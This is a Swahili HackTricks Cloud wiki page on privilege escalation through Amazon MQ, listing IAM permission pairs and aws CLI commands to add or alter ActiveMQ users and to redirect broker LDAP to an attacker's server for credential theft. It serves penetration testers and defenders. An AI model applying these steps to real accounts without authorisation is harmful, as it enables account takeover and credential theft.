Swahili - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - MQ Privesc

Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

MQ

Kwa habari zaidi kuhusu MQ angalia:

pageAWS - MQ Enum

mq:ListBrokers, mq:CreateUser

Kwa ruhusa hizo unaweza kuunda mtumiaji mpya kwenye mshiriki wa ActimeMQ (hii haifanyi kazi kwenye RabbitMQ):

aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>

Madhara Yanayoweza Kutokea: Kupata taarifa nyeti kwa kupitia ActiveMQ

mq:ListBrokers, mq:ListUsers, mq:UpdateUser

Kwa ruhusa hizo unaweza kuunda mtumiaji mpya katika mshiriki wa ActimeMQ (hii haitafanyika katika RabbitMQ):

```bash aws mq list-brokers aws mq list-users --broker-id aws mq update-user --broker-id --console-access --password --username ``` **Madhara Yanayoweza Kutokea:** Kupata taarifa nyeti kwa kupitia ActiveMQ

mq:ListBrokers, mq:UpdateBroker

Ikiwa broker anatumia LDAP kwa idhini na ActiveMQ. Niwezekana kubadilisha mipangilio ya seva ya LDAP iliyo inayodhibitiwa na mshambuliaji. Kwa njia hii mshambuliaji ataweza kuiba vyeti vyote vinavyotumwa kupitia LDAP.

aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...

Ikiwa ungepata vibali halisi vilivyotumiwa na ActiveMQ unaweza kufanya MitM, kuiba vibali, kuvitumia kwenye seva ya awali, na kutuma majibu (labda kwa kutumia tena vibali vilivyoibiwa unaweza kufanya hivi).

Athari Inayowezekana: Kuiba vibali vya ActiveMQ

Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

PreviousAWS - Mediapackage PrivescNextAWS - MSK Privesc

Last updated